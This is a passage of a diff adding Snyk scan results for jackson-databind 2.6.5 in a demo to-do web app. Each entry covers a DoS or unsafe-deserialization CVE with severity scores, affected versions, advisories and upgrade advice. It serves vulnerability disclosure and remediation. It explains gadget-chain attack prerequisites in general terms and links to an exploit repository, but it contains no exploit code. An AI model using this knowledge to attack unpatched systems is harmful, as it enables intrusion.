Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": 